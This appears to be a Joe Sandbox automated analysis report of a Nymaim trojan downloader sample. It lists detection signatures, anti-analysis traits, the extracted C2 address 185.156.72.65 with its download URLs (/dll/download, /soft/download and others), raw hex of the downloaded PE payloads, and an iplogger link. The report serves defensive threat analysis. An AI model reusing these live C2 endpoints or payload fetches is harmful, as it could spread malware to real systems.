Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565534
MD5:9d2eed099096486e2ae388b2b220497c
SHA1:c84457bca7db83641fd56925c6496b4c9a8c6c5b
SHA256:5d5a9d7c44e0dbd125b577319dcad5274121c38b6cde03658eb83c49e316d307
Tags:exeuser-Bitsight
Infos:

Detection

Nymaim
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 4708 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9D2EED099096486E2AE388B2B220497C)
    • WerFault.exe (PID: 7496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 644 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
NymaimNymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim
{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
SourceRuleDescriptionAuthorStrings
00000001.00000002.2025597799.0000000004780000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x8436:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000001.00000003.1309173402.0000000004A20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
        00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        SourceRuleDescriptionAuthorStrings
        1.2.file.exe.4930e67.1.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          1.2.file.exe.400000.0.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            1.2.file.exe.400000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              1.3.file.exe.4a20000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                No Sigma rule has matched
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 1.2.file.exe.400000.0.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]ReversingLabs: Detection: 75%
                Source: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exeReversingLabs: Detection: 75%
                Source: file.exeReversingLabs: Detection: 31%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Joe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exeJoe Sandbox ML: detected
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,1_2_004035D0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_04933837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,1_2_04933837
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00417727 FindFirstFileExW,1_2_00417727
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_10007EA9 FindFirstFileExW,1_2_10007EA9
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0494798E FindFirstFileExW,1_2_0494798E

                Networking

                barindex
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 04:35:53 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 04:35:54 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
                Source: Joe Sandbox ViewIP Address: 185.156.72.65 185.156.72.65
                Source: Joe Sandbox ViewASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,1_2_00401970
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                Source: file.exe, 00000001.00000002.2024454401.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/dll/download
                Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/dll/key
                Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2024454401.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/files/download
                Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2024454401.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/soft/download
                Source: Amcache.hve.14.drString found in binary or memory: http://upx.sf.net
                Source: file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
                Source: file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.drString found in binary or memory: https://g-cleanit.hk
                Source: file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.drString found in binary or memory: https://iplogger.org/1Pz8p7

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 1.2.file.exe.4930e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
